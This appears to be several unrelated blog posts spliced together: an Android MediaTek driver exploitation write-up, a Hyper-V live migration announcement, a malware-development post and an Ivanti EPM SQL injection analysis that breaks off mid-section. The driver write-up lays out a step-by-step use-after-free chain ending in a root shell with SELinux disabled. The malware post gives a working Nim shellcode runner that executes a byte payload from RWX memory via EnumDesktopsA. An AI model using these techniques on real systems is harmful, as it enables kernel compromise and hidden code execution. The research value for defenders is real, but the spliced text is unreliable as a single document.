                        sizeof(struct JPEG_DEC_DRV_HYBRID_P_N_S))) {

                        JPEG_LOG(0, "Copy from user error");

                        return -EFAULT;

                }

                /* set timeout */

                timeout_jiff = msecs_to_jiffies(3000);

                JPEG_LOG(1, "JPEG Hybrid Decoder Wait Resume Time: %ld",

                                timeout_jiff);

                hwid = pnsParmas.hwid;

                if (hwid < 0 || hwid >= HW_CORE_NUMBER) { //In other versions of the driver, this >= check was omitted, which led to several different OOB accesses later aka CVE-2023-32837

                        JPEG_LOG(0, "get hybrid dec id failed");

                        return -EFAULT;

                }

                if (!dec_hwlocked[hwid]) {

                        JPEG_LOG(0, "wait on unlock core %d\n", hwid);

                        return -EFAULT;

                }

                if (jpeg_isr_hybrid_dec_lisr(hwid) < 0) {

                        long ret = 0;

                        int waitfailcnt = 0;

                        do {

                                ret = wait_event_interruptible_timeout(

                                        hybrid_dec_wait_queue[hwid],

                                        _jpeg_hybrid_dec_int_status[hwid],

                                        timeout_jiff);

                                ...

                                if (ret < 0) {

                                        waitfailcnt++;

                                        usleep_range(10000, 20000);

                                }

                        } while (ret < 0 && waitfailcnt < 500);

                }

                ...

                if (copy_to_user(pnsParmas.progress_n_status, &progress_n_status,                                sizeof(int))) {

                        return -EFAULT;

                }

                ...

                jpeg_drv_hybrid_dec_unlock(hwid);

                break;

                ...

}

...

static void jpeg_drv_hybrid_dec_unlock(unsigned int hwid)

{

        mutex_lock(&jpeg_hybrid_dec_lock);

        if (!dec_hwlocked[hwid]) {

                JPEG_LOG(0, "try to unlock a free core %d", hwid);

        } else {

                dec_hwlocked[hwid] = false;

                JPEG_LOG(1, "jpeg dec HW core %d is unlocked", hwid);

                jpeg_drv_hybrid_dec_power_off(hwid);

                disable_irq(gJpegqDev.hybriddecIrqId[hwid]);

                jpg_dmabuf_free_iova(bufInfo[hwid].i_dbuf,

                        bufInfo[hwid].i_attach,

                        bufInfo[hwid].i_sgt);

                jpg_dmabuf_free_iova(bufInfo[hwid].o_dbuf,

                        bufInfo[hwid].o_attach,

                        bufInfo[hwid].o_sgt);

                jpg_dmabuf_put(bufInfo[hwid].i_dbuf);

                jpg_dmabuf_put(bufInfo[hwid].o_dbuf);

                // we manually add 1 ref count, need to put it.

        }

        mutex_unlock(&jpeg_hybrid_dec_lock);

}

jpeg_drv_hybrid_dec_unlock is also called in the event that jpeg_drv_hybrid_dec_start fails.

While the jpeg_hybrid_dec_lock mutex protects the direct core locking and unlocking, it does not protect the body of the jpeg_drv_hybrid_dec_start function. This means that while there cannot be concurrent calls to both jpeg_drv_hybrid_dec_lock and jpeg_drv_hybrid_dec_unlock, there can be concurrent calls to jpeg_drv_hybrid_dec_start and jpeg_drv_hybrid_dec_unlock which in practice is just as bad, as these two functions racily access the same global data structure bufInfo.

One small added complication for this bug is that in order to reach the jpeg_drv_hybrid_dec_unlock in the JPEG_DEC_IOCTL_HYBRID_WAIT call, the core must be locked before the timeout due to a check to ensure that the core is locked before attempting to wait on the core.

An example of this race in practice with two processes A and B would be (colorized respective to the above code):

Process A:

Calls ioctl JPEG_DEC_IOCTL_HYBRID_START, which locks core 0 with jpeg_drv_hybrid_dec_lock and enters jpeg_drv_hybrid_dec_start

Process B:

Calls ioctl JPEG_DEC_IOCTL_HYBRID_WAIT, which confirms that core 0 is locked then begins a 3 second wait for the core to send an interrupt denoting completion of the decoding request.

Process A:

Fails jpeg_drv_hybrid_dec_start, (after initializing some of the data structures), calls jpeg_drv_hybrid_dec_unlock on core 0 freeing any allocated resources, and returns to userland.

[wait ~3 seconds]

Process A:

Calls ioctl JPEG_DEC_IOCTL_HYBRID_START, which locks core 0 with jpeg_drv_hybrid_dec_lock and enters jpeg_drv_hybrid_dec_start

Process B:
3 second wait times out, and the JPEG_DEC_IOCTL_HYBRID_WAIT ioctl call unlocks core 0 with jpeg_drv_hybrid_dec_unlock.

[Process A and B are now concurrently initializing and freeing the same data-structures]

This can lead to a variety of use-after-free or double free conditions, depending on how process A and B race.

The Journey to root

The next step was to try to exploit these issues. My first attempt targeted the OOB write issue, CVE-2023-32837. I was able to develop the primitive from an uncontrolled OOB read/write in the kernel .data region into a racy write of null bytes at a predetermined offset in a kernel task stack used by an attacker-controlled process. At this point it was possible to overwrite a kernel stack entry with nulls during any syscall which felt to me like enough flexibility to create a full exploit. However, despite my best efforts (including the creation of a tool to find where in an arbitrary backtrace the write would occur), I was unable to discover a technique to create a better primitive from this write.

Failing that effort, I decided to take a look at the other issue in the same driver CVE-2023-32832. During the freeing step that races with jpeg_drv_hybrid_dec_start, jpeg_drv_hybrid_dec_unlock drops access to four separate resources:

jpg_dmabuf_free_iova(bufInfo[hwid].i_dbuf, bufInfo[hwid].i_attach, bufInfo[hwid].i_sgt); //The input buffer virtual address mapping in the core

jpg_dmabuf_free_iova(bufInfo[hwid].o_dbuf, bufInfo[hwid].o_attach, bufInfo[hwid].o_sgt); //The output buffer virtual address mapping in the core

jpg_dmabuf_put(bufInfo[hwid].i_dbuf); //The input buffer file's refcount is decremented. This buffer was previously allocated by the attacker and is associated with a file descriptor.

jpg_dmabuf_put(bufInfo[hwid].o_dbuf); //The output buffer file's refcount is decremented. This buffer was previously allocated during jpeg_drv_hybrid_dec_start.

One critical behavior of the driver that enhanced exploitability was that although jpeg_drv_hybrid_dec_unlock properly drops the refcounts of i_dbuf and o_dbuf, it does not reinitialize those entries in the bufInfo global array to NULL. As it relates to the race, this means that if Process B’s racy jpeg_drv_hybrid_dec_unlock occurs before Process A’s second jpeg_drv_hybrid_dec_start reinitializes i_dbuf and o_dbuf, an extra refcount of i_dbuf and o_dbuf will be released. Since i_dbuf and o_dbuf are struct file*’s, this can lead directly to a struct file UAF. As the i_dbuf struct file comes directly from a dmabuf file descriptor passed into jpeg_drv_hybrid_dec_start, this leads to a dangling file descriptor with the struct file freed from underneath it. This is undoubtedly an exploitable bug.

There are several different techniques for exploiting a dangling file descriptor. One widely used strategy is causing the backing slab page of the struct file to be freed and returned back to the page allocator, then reallocating that page with pipe buffer data pages in order to gain attacker control over the memory used for the struct file. Another well-known strategy would be to utilize the cross-cache technique to reallocate the memory as a different kind of kmalloc slab/object. However, in the future both of these techniques may be remediated if the SLAB_VIRTUAL mitigation comes into effect in the mainline Linux kernel. In the interest of exploring the future of Android kernel hacking, I sought a novel exploitation technique which did not involve cross-cache or slab-cache->page allocator heap shaping techniques.

Some Other Novel Exploitation Technique

One of the most common UAF exploit techniques involves reallocating the first-order freed object with a new object of a different type, creating a type-confusion condition which leads to an improved memory corruption primitive. However the only type of object that can be allocated in a page designated for the struct file cache is the struct file type, so the options for creating a type confusion memory corruption condition using first-order object reclamation are limited. However, just because an object is freed does not preclude it from being usable under limited circumstances. When the kernel inserts an object onto a freelist, this clobbers the middle of the object. The rest of the object however, remains in whatever state it was in at the moment it was freed, including pointers and any other member variables. Those stale pointers can (and in practice often do) point to other freed objects which may be allocated from a different slab cache entirely, potentially including the generic kmalloc slab-caches. Note that under the C-ism where pointers are set to NULL after freeing, these stale pointers wouldn’t exist. However as the memory containing the pointer is getting freed anyway, setting these pointers to NULL is often seen as unnecessarily conservative (and in fact, C compilers often throw away writes to objects that are about to be freed).

By continuing to use this freed first-order object, we can implicitly access freed second-order child objects. By reclaiming those objects, we can recreate a type-confusion memory corruption primitive, taking advantage of how the methods called on the first-order freed object implicitly access the second-order child object. Let’s see how we can apply this to our specific scenario.

Linux kernel struct files may represent many different types of files depending on the kind of opened file such as ext4 files, procfs files, or even MediaTek JPEG decoding driver files. In order to represent all of these different types while also maintaining some commonality of structure for the universally needed members of an opened file, struct file contains a private_data member which references any type-specific data needed.

As mentioned previously, the UAF’d struct file in this case is a dmabuf file. This means the private_data pointer points to a struct dma_buf object. The dma_buf object lifetime is implicitly tied to the lifetime of the associated dmabuf file struct. When the dmabuf struct file is freed, the dma_buf object is freed too. However unlike the struct file, dma_buf objects are allocated from the generic kmalloc slab caches. This means that the dma_buf can be reclaimed with a different type object that comes from the same generic kmalloc slab cache.

After a hypothetical reclamation by a new object, this new object can still be UAF referenced as a dma_buf through the freed but still very usable dmabuf struct file that itself is referenced via the dangling file descriptor! Thus we arrive at the following strategy:

  1. Free the file by using our race condition bug to drop an extra reference on i_dbuf (which also frees the dma_buf), leaving a dangling fd pointing to a freed struct file which still has a stale pointer to a freed dma_buf
  2. Reclaim the dma_buf WITHOUT reclaiming the struct file
  3. Call dma_buf operations on the dangling fd

You may have astutely noted by this point that this strategy relies on a freed object (that is, the struct file) not being reclaimed as another object by the heap allocator. This is absolutely correct, and one would expect that in an exploit where exceptional reliability is a priority, it may be necessary to perform some heap shaping in order to bury this freed struct file deeply in the allocator freelists. In practice (and in my exploit), the freed struct file will rarely be on the percpu active slab so it’s unlikely to get reclaimed immediately, and my exploit generally runs fast enough that it doesn’t matter.

At this point we now need to determine what object to use in order to reclaim the freed dma_buf, as well as what operation to call on the freed dma_buf file/object to develop a stronger primitive. I ended up finding the solutions to both of these problems in the GED driver.

The GED driver

The GED (GPU Extension Device) driver is a MediaTek-specific interface that provides userland with several supplementary GPU features, primarily for tuning purposes. Two of its “features” appeared particularly valuable. Feature number one, GED GE Buffers, presented a truly remarkable heap spray and reclamation primitive. This feature provides several requisite characteristics of a suitable heap spray primitive:

  • Allocates buffers of a controlled size without causing undue noise for the rest of the heap.
  • Buffer data is fully attacker controlled, with no uncontrolled header at the beginning
  • Buffers can be freed at any time.

One standout characteristic that elevates this heap spray primitive above many of its peers however, is that even once allocated, the attacker can read and write to these buffers at will while keeping the buffer allocated. This is about as powerful a heap spray primitive as one could imagine. By reclaiming the UAF’d dma_buf struct with a GED GE buffer, we gain fully deterministic read/write over the dma_buf struct, including any pointers contained therein.

Graph showing the overlapping object hierarchy of a UAF'd dma buffer struct file and a GE file

Feature number two is an alternate codepath to the same functionality as the DMA_BUF_SET_NAME ioctl, which is (very sensibly) used to set the name of a dma_buf. The biggest difference between these paths is the GED codepath’s lack of SELinux inode checks on the underlying dma_buf fd. These inode checks would normally crash the kernel when they run on a freed struct file - however because of the GED codepath, we can skip this inode check, and change the dma_buf’s name despite running on a freed dma_buf file! Normally, this code would free the pointer to the previous name within the dma_buf struct and allocate a new buffer for the name string. However, because of GED GE buffers we are able to control the entirety of the dma_buf struct. By combining these primitives, we can kfree an arbitrary pointer before setting a new name string.

long mtk_dma_buf_set_name(struct dma_buf *dmabuf, const char *buf)

{

        char *name = kstrndup(buf, DMA_BUF_NAME_LEN, GFP_KERNEL);

        ...

        kfree(dmabuf->name); //dmabuf is attacker controlled

        dmabuf->name = name; //the name pointer is written to attacker controlled memory

        ...

}

Achieving arbitrary read

Innocuous dmabuf file operations become potent primitives now that we have precise control of the dma_buf struct. For example, this is the code backing /proc/pid/fdinfo/n for dmabuf files:

static void dma_buf_show_fdinfo(struct seq_file *m, struct file *file)

{

        struct dma_buf *dmabuf = file->private_data;

        seq_printf(m, "size:\t%zu\n", dmabuf->size);

        /* Don't count the temporary reference taken inside procfs seq_show */

        seq_printf(m, "count:\t%ld\n", file_count(dmabuf->file) - 1);

        seq_printf(m, "exp_name:\t%s\n", dmabuf->exp_name);

        spin_lock(&dmabuf->name_lock);

        if (dmabuf->name)

                seq_printf(m, "name:\t%s\n", dmabuf->name);

        spin_unlock(&dmabuf->name_lock);

}

There are several opportunities in this function for achieving arbitrary read, but the cleanest one is the file_count() call, which will dereference the passed pointer + a hardcoded offset, and print the read 8 byte value as a signed long. Normally in the context of this C function, file == ((struct dma_buf*) file->private_data)->file , but since we control the dma_buf struct that isn’t necessarily the case.

Achieving arbitrary write

At this point we have three powerful primitives:

  • Read/write UAF’d dma_buf struct memory (via GED GE buffers)
  • Arbitrary read (via dma_buf_show_fdinfo)
  • Arbitrary free (via ged_dmabuf_set_name)

Graph showing our arbitrary read and arbitrary free primitives via the UAF'd dma buffer

There are many potential strategies that use these primitives to achieve an arbitrary write primitive. The technique I chose was to type-confuse a GE buffer with a GE buffer array. GED GE Buffers are tracked through a hierarchy of structs and arrays. A GE file’s private_data member points to an array of GE buffer pointers like so:

Graph showing the object hierarchy of GE files within an fdtable down to GE buffers

I achieve this type-confusion by using the arbitrary-free primitive developed previously to free a GE buffer array, then reclaiming that array with a GE buffer from a second GE file. Since the GE buffer array (and GE buffers as well) come from generic kmalloc caches, the only requirement for this reclamation is allocating GE buffers that are the same size as a GE buffer array. If two GE files are referencing the same memory, one (GE file A) as a GE buffer, and one (GE file B) as a GE buffer array, I can modify the contents of a GE buffer array at will.

Graph showing the overlapping object hierarchy of two GE files where one file's GE buffer is another file's GE buffer array

Then performing an arbitrary write to a virtual address X will be as simple as using GE file A’s GE buffer to change the contents of the array to point to the virtual address X, then writing to that address using GE file B which now thinks virtual address X is a GE buffer!

This technique hinges on being able to use the arbitrary free primitive to free a GE buffer array. To do that, it’s necessary to find the virtual address of a GE buffer array first. Since we have an arbitrary read primitive already, any parent struct/object/array of a GE buffer array will be enough to find the virtual address of a GE buffer array itself. The hierarchy is as follows:

  1. GE arrays are referenced by a GE file
  2. GE files are referenced by an fdtable as a file descriptor
  3. An fdtable is referenced by a task struct
  4. Task structs are referenced as part of the task list with the root node being the init task in the kernel image

The fdtable represents an attractive object to find, as it comes out of the same generic kmalloc cache as dma_buf name strings. We can find a dma_buf name string’s virtual address by using dma_buf_set_name (which we also use as our arbitrary free primitive) to insert a pointer to a dma_buf name string into the reclaimed UAF’d dma_buf object that is now a GE buffer. We then simply read it out of our GE buffer, free that dma_buf name string (again using dma_buf_set_name), and reclaim it with an fdtable. Creating fdtables is fairly easy - we simply fork many processes ahead of time that share an fdtable, then unshare(2) the fdtable at the appropriate time to allocate new fdtables. The full exploit strategy is as follows:

  1. Trigger a dangling fd of a dmabuf file using our mtk-jpeg race condition bug
  2. Reclaim the underlying dma_buf leaving the parent dmabuf file free (but still referenced by a dangling file descriptor)
  3. Use ged_dmabuf_set_name on our dangling file to place a new name pointer in the fake dma_buf struct
  4. Read the fake dma_buf struct (which is really a GE buffer) to get the name pointer
  5. Free the name pointer by calling ged_dmabuf_set_name again
  6. Reclaim the name pointer as an fdtable with references to a GE fd with an array of GE buffers
  7. Use the arbitrary read to find the GE buffer array
  8. Use the arbitrary free to free the GE buffer array
  9. Reclaim the GE buffer array with another GE buffer

At the end of this process we’ll have a reliable arbitrary read/write!

Getting a root shell

As a fun exercise, I decided to see how easy it was to disable SELinux and get root after achieving arbitrary read/write. Various manufacturers may implement certain tripping hazards to slow down exploit development efforts, but in my case (Asus ROG 6D), there were no hoops I needed to jump through at all. It was enough to simply write 0 to the uid/gid of my process’s cred struct to achieve root, and write 0 to the selinux_enforcing bit to turn off SELinux. After this I just execlp(“/system/bin/sh”,...) and out pops a root shell!

Getting root on an Android device with the exploit

Conclusion

I discovered significant security vulnerabilities across all 3 of the evaluated devices. It is highly likely that reviewing more devices comprising a greater spread of chipset manufacturers would lead to the discovery of additional vulnerabilities. Android regularly uses higher-privileged processes to liaise between applications and kernel drivers, meaning that most kernel drivers cannot be seen from an unprivileged app context (the GPU being the most obvious exception to this rule). Nevertheless, a determined attacker could use vulnerabilities in other more privileged processes to pivot into contexts from which the attack surface of these kernel drivers become reachable. This pivot strategy could widen the attack surface beyond the scope of this research.

As it becomes more difficult to find 0-days in core Android, third-party Linux kernel drivers continue to become a more and more attractive target for attackers. While the bulk of present-day detected ITW Android exploitation targets GPU drivers, it’s equally important that other third-party drivers are encouraged towards the same security standards.

There is room for improvement in the patching process across all 3 of the bugs discovered. None of the patches for these bugs met Project Zero's 90-day deadline for patches reaching end-users. This appears to largely be a result of the propagation delay from when third-party driver developers issue patches to when downstream manufacturers can incorporate those patches into Android security updates. Shortening this propagation delay (e.g. using Android APEX to ship updated kernel drivers) would go a long way to minimizing the Android driver patch gap. In addition, one of these bugs was only partially patched and remained exploitable on some devices for an additional 2 years before the security impact of the bug was assessed and publicly reported. Developers should regularly consider the security impacts of bugs, especially those reported by static analysis tools designed to detect security-relevant issues.

Finally, while cross-cache heap shaping mitigations significantly impede exploit development strategies, they don’t entirely prevent a determined attacker from exploiting kernel UAF vulnerabilities, even if the UAF’d object comes out of a dedicated slab cache. In this particular case, second-order allocations in a UAF’d object lead to powerful and exploitable primitives. Developers may be able to mitigate this technique by setting pointers to NULL, even if the parent object is about to get freed anyway. However, this exploit technique demonstrates that even well-designed mitigations (such as SLAB_VIRTUAL) come with limitations in an era where an attacker can achieve undetected memory corruption. It will take more fundamental mitigations that address the root issue of memory corruption, like MTE, in order to dramatically raise the bar for attackers.

Resources

This research was presented at ShmooCon, a video is available here https://archive.org/details/shmoocon2024/Shmoocon2024-SethJenkins-Driving_Forward_in_Android_Drivers.mp4

The proof of concept exploit code developed and presented in this research is available at:

https://bugs.chromium.org/p/project-zero/issues/detail?id=2470#c4

Hyper-V live migration network selection in Windows Server 2025

Microsoft continues to bring innovation and improvements to our Hyper-V platform. Live migration has been around for a while and is a key component to managing virtual machines (VMs). With Windows Server 2025 you will see improvements that make Hyper-V more reliable, increase scale, and improve performance. This article covers an improvement with Live Migration, and you can expect to see more articles soon to cover other innovations for Windows Server 2025.

 

NEW! Live migration network selection for Windows Server 2025

The live migration network selection logic in failover clusters has been improved for Windows Server 2025 to accommodate both directly connected cluster interconnects, and multi-site clusters that do not use a stretched subnet (common cluster network).

 

Directly connected cluster interconnects

The network configuration for most failover clusters is either flowing through switches (see diagram 1 below), or direct connections between each node (see diagram 2 below).

The most common reason to use direct connection topology is Storage Spaces Direct (S2D). It requires high bandwidth, low latency, and reliable network interconnects between each node, and recommends enabling RDMA. This can be satisfied through either the switched or switchless topology. Switched allows for easier scale-out and fewer network interfaces per node. Switchless removes the cost of one or more high-bandwidth switches and the complexity of configuring a switch for RDMA. Reliability can be better with switchless configuration since it removes the potential for network interruptions due to switch resets or switch maintenance and misconfiguration. Both networking topologies are valid and have their own advantages and are fully supported.

 

StevenEkren_1-1718231644177.png

Diagram 1: Switched interconnect topology

StevenEkren_2-1718231644186.png

Diagram 2: Direct Connected Topology

 

Optimizing live migration in directly connected clusters

Live migration moves a VM between servers, and in the case of a failover cluster between cluster nodes of the same cluster. It’s a critical component of the system, allowing the VM to stay running during host maintenance or to load-balance the cluster.

The state of the VM is moved from the source node to the destination node of the cluster through a network. Since most clusters have multiple networks, there is logic implemented to allow identifying and selecting preferred and possible live migration networks. In the switched topology most, if not all, networks are capable of connecting between the nodes. In the switchless topology, most networks only allow connection between pairs of nodes.

Windows Server 2025 has improved logic to more quickly identify which network is optimal between a specific source and destination set of nodes for the live migration. It gets the list of networks that can send traffic between the source and destination from the cluster, then uses the most preferred network and only interfaces that are on cluster networks that are enabled for live migration will be considered. In previous versions, the logic could take more time because the first preferred network would be tried and would wait approximately 20 seconds for it to succeed. If the connection doesn’t succeed, it will try the next until it finds one that does. Therefore, with Windows Server 2025, live migration initiation will be faster and more consistent.

 

Optimizing live migration in multi-site clusters

Multi-site clusters (also known as stretched clusters) are commonly deployed for disaster recovery scenarios. VMs can run at either site. If a site goes down, VMs are automatically recovered (restarted) at the other site. While common host maintenance activities like patch/update involve live migration of VMs, it is usually to other nodes in the same site. Live migration of VMs between nodes in different sites is usually used for load balancing or maintenance of systems involving the entire site.

Windows Server 2025 improves the logic in identifying which NICs on the source node of a live migration have a routed path to the destination node. Previously routed paths between nodes were not discovered and could cause issues for live migration. In the examples above (diagrams 1 and 2), there are one or more NICs on the same subnet (cluster network) between every possible pair of nodes. With the multi-site cluster configuration (diagram 3 below), it’s typical that there is no subnet that is common between nodes in different sites. Previously, routed paths between nodes were not discovered and could cause issues for live migration. Windows Server 2025 now accommodates this configuration. When the cluster provides the list of networks in which the source and destination can connect through, it will include routed paths.

StevenEkren_3-1718231644190.png

Diagram 3: Multi-site cluster showing a routed network path between source and destination servers in different sites

 

Summary

Hyper-V is a core technology that continues to bring innovation to our on-premises server platforms by bringing new features and functionality that enhance reliability, improve performance, and light up new value. These live migration optimizations are part of the ongoing platform improvement and accrue to both Windows Server 2025 and Azure Stack HCI 24H2.

 

Helpful References:

Failover Clustering Networking Basics and Fundamentals - Microsoft Community Hub

New Cluster-Wide Control for Virtual Machine Live Migrations in Windows Server and Azure Stack HCI - Microsoft Community Hub

Malware development trick 39: Run payload via EnumDesktopsA. Simple Nim example.

12 June 2024 at 01:00

Hello, cybersecurity enthusiasts and white hackers!

malware

This post is just checking correctness of running payload via EnumDesktopsA in Nim programming language.

EnumDesktopsA function passes the name of each desktop to a callback function defined by the application:

BOOL EnumDesktopsA(
  HWINSTA          hwinsta,
  DESKTOPENUMPROCA lpEnumFunc,
  LPARAM           lParam
);

practical example

Just update our C code from one of the previous posts with Nim language:

import system
import winim

when isMainModule:
  let payload: seq[byte] = @[
    byte 0xfc, 0x48, 0x81, 0xe4, 0xf0, 0xff, 0xff, 0xff, 0xe8, 0xd0, 0x0, 0x0, 0x0, 0x41, 0x51, 0x41,
    0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x3e, 0x48, 0x8b, 0x52,
    0x18, 0x3e, 0x48, 0x8b, 0x52, 0x20, 0x3e, 0x48, 0x8b, 0x72, 0x50, 0x3e, 0x48, 0xf, 0xb7, 0x4a,
    0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x2, 0x2c, 0x20, 0x41, 0xc1,
    0xc9, 0xd, 0x41, 0x1, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x3e, 0x48, 0x8b, 0x52, 0x20, 0x3e,
    0x8b, 0x42, 0x3c, 0x48, 0x1, 0xd0, 0x3e, 0x8b, 0x80, 0x88, 0x0, 0x0, 0x0, 0x48, 0x85, 0xc0,
    0x74, 0x6f, 0x48, 0x1, 0xd0, 0x50, 0x3e, 0x8b, 0x48, 0x18, 0x3e, 0x44, 0x8b, 0x40, 0x20, 0x49,
    0x1, 0xd0, 0xe3, 0x5c, 0x48, 0xff, 0xc9, 0x3e, 0x41, 0x8b, 0x34, 0x88, 0x48, 0x1, 0xd6, 0x4d,
    0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x41, 0xc1, 0xc9, 0xd, 0x41, 0x1, 0xc1, 0x38, 0xe0, 0x75,
    0xf1, 0x3e, 0x4c, 0x3, 0x4c, 0x24, 0x8, 0x45, 0x39, 0xd1, 0x75, 0xd6, 0x58, 0x3e, 0x44, 0x8b,
    0x40, 0x24, 0x49, 0x1, 0xd0, 0x66, 0x3e, 0x41, 0x8b, 0xc, 0x48, 0x3e, 0x44, 0x8b, 0x40, 0x1c,
    0x49, 0x1, 0xd0, 0x3e, 0x41, 0x8b, 0x4, 0x88, 0x48, 0x1, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e,
    0x59, 0x5a, 0x41, 0x58, 0x41, 0x59, 0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0,
    0x58, 0x41, 0x59, 0x5a, 0x3e, 0x48, 0x8b, 0x12, 0xe9, 0x49, 0xff, 0xff, 0xff, 0x5d, 0x49, 0xc7,
    0xc1, 0x0, 0x0, 0x0, 0x0, 0x3e, 0x48, 0x8d, 0x95, 0xfe, 0x0, 0x0, 0x0, 0x3e, 0x4c, 0x8d, 0x85,
    0x9, 0x1, 0x0, 0x0, 0x48, 0x31, 0xc9, 0x41, 0xba, 0x45, 0x83, 0x56, 0x7, 0xff, 0xd5, 0x48,
    0x31, 0xc9, 0x41, 0xba, 0xf0, 0xb5, 0xa2, 0x56, 0xff, 0xd5, 0x4d, 0x65, 0x6f, 0x77, 0x2d, 0x6d,
    0x65, 0x6f, 0x77, 0x21, 0x0, 0x3d, 0x5e, 0x2e, 0x2e, 0x5e, 0x3d, 0x0
  ]

  let mem = VirtualAlloc(
    NULL, cast[SIZE_T](payload.len), 
    MEM_COMMIT, PAGE_EXECUTE_READWRITE
    )
  RtlMoveMemory(
    mem, 
    unsafeAddr payload[0], 
    cast[SIZE_T](payload.len)
    )
  EnumDesktopsA(
    GetProcessWindowStation(), 
    cast[DESKTOPENUMPROCA](mem), 
    cast[LPARAM](NULL)
    )

As usual, I used meow-meow messagebox payload:

let payload: seq[byte] = @[
    byte 0xfc, 0x48, 0x81, 0xe4, 0xf0, 0xff, 0xff, 0xff, 0xe8, 0xd0, 0x0, 0x0, 0x0, 0x41, 0x51, 0x41,
    0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x3e, 0x48, 0x8b, 0x52,
    0x18, 0x3e, 0x48, 0x8b, 0x52, 0x20, 0x3e, 0x48, 0x8b, 0x72, 0x50, 0x3e, 0x48, 0xf, 0xb7, 0x4a,
    0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x2, 0x2c, 0x20, 0x41, 0xc1,
    0xc9, 0xd, 0x41, 0x1, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x3e, 0x48, 0x8b, 0x52, 0x20, 0x3e,
    0x8b, 0x42, 0x3c, 0x48, 0x1, 0xd0, 0x3e, 0x8b, 0x80, 0x88, 0x0, 0x0, 0x0, 0x48, 0x85, 0xc0,
    0x74, 0x6f, 0x48, 0x1, 0xd0, 0x50, 0x3e, 0x8b, 0x48, 0x18, 0x3e, 0x44, 0x8b, 0x40, 0x20, 0x49,
    0x1, 0xd0, 0xe3, 0x5c, 0x48, 0xff, 0xc9, 0x3e, 0x41, 0x8b, 0x34, 0x88, 0x48, 0x1, 0xd6, 0x4d,
    0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x41, 0xc1, 0xc9, 0xd, 0x41, 0x1, 0xc1, 0x38, 0xe0, 0x75,
    0xf1, 0x3e, 0x4c, 0x3, 0x4c, 0x24, 0x8, 0x45, 0x39, 0xd1, 0x75, 0xd6, 0x58, 0x3e, 0x44, 0x8b,
    0x40, 0x24, 0x49, 0x1, 0xd0, 0x66, 0x3e, 0x41, 0x8b, 0xc, 0x48, 0x3e, 0x44, 0x8b, 0x40, 0x1c,
    0x49, 0x1, 0xd0, 0x3e, 0x41, 0x8b, 0x4, 0x88, 0x48, 0x1, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e,
    0x59, 0x5a, 0x41, 0x58, 0x41, 0x59, 0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0,
    0x58, 0x41, 0x59, 0x5a, 0x3e, 0x48, 0x8b, 0x12, 0xe9, 0x49, 0xff, 0xff, 0xff, 0x5d, 0x49, 0xc7,
    0xc1, 0x0, 0x0, 0x0, 0x0, 0x3e, 0x48, 0x8d, 0x95, 0xfe, 0x0, 0x0, 0x0, 0x3e, 0x4c, 0x8d, 0x85,
    0x9, 0x1, 0x0, 0x0, 0x48, 0x31, 0xc9, 0x41, 0xba, 0x45, 0x83, 0x56, 0x7, 0xff, 0xd5, 0x48,
    0x31, 0xc9, 0x41, 0xba, 0xf0, 0xb5, 0xa2, 0x56, 0xff, 0xd5, 0x4d, 0x65, 0x6f, 0x77, 0x2d, 0x6d,
    0x65, 0x6f, 0x77, 0x21, 0x0, 0x3d, 0x5e, 0x2e, 0x2e, 0x5e, 0x3d, 0x0
  ]

demo

Let’s check it in action. Compile it:

nim c -d:mingw --cpu:amd64 hack.nim

malware

Then, just move it to the victim’s machine (Windows 11 in my case) and run:

.\hack.exe

malware

As you can see, everything is worked perfectly also for Nim language =^..^=!

Malware development trick 20: Run shellcode via EnumDesktopsA, C example
source code in github

This is a practical case for educational purposes only.

Thanks for your time happy hacking and good bye!
PS. All drawings and screenshots are mine

CVE-2024-29824 Deep Dive: Ivanti EPM SQL Injection Remote Code Execution Vulnerability

12 June 2024 at 14:27

Introduction

Ivanti Endpoint Manager (EPM) is an enterprise endpoint management solution that allows for centralized management of devices within an organization. On May 24, 2024, ZDI and Ivanti released an advisory describing a SQL injection resulting in remote code execution with a CVSS score of 9.8. In this post we will detail the internal workings of this vulnerability. Our POC can be found here.

RecordGoodApp

Luckily for us, the ZDI advisory told us exactly where to look for the SQL injection. A function named RecordGoodApp. After installation, we find most of the application binaries in C:\Program Files\LANDesk. Searching for RecordGoodApp we find its present in a file named PatchBiz.dll.

RecordGoodApp Search

RecordGoodApp Search

We can use JetBrains dotPeek tool to disassemble the PatchBiz.dll C# binary. From there we can search for the RecordGoodApp method.

RecordGoodApp Disassembly

RecordGoodApp Disassembly

We can readily see that the first SQL statement in the function is potentially vulnerable to an SQL injection. They use string.Format to insert the value of goodApp.md5 into the SQL query. Assuming we can find a way to influence the value of goodApp.md5 we should be able to trigger the SQL injection.

Finding a Path to the Vulnerable Function

Next, we would like to see if there are any obvious paths to the RecordGoodApp function that we can use to trigger the vulnerability. Luckily we can use dotPeek again to search for any references to RecordGoodApp. However, to make sure we don’t miss anything, we first want to make sure that we have all potential application binaries loaded into dotPeek. If we don’t, we run the risk of missing a reference to the vulnerable function. We find that RecordGoodApp is first called from AppMonitorAction.RecordPatchIssue.

AppMonitorAction.RecordPatchIssue

AppMonitorAction.RecordPatchIssue

Continuing, we find the AppMonitorAction.RecordPatchIsssue is called by Patch.UpdateActionHistory

Patch.UpdateActionHistory

Patch.UpdateActionHistory

We find that UpdateActionHistory is called from three different locations.

Patch.UpdateActionHistory Usage

Patch.UpdateActionHistory Usage

This most interesting of these usages is StatusEvents.EventHandler.UpdateStatusEvents. We find that it is annotated with [WebMethod] in the EventHandler class. EventHandler inherits from System.Web.Services.WebService. This strongly indicates that we should be able to hit UpdateStatusEvents over HTTP.

UpdateStatusEvents

UpdateStatusEvents

Triggering the Vulnerable Function

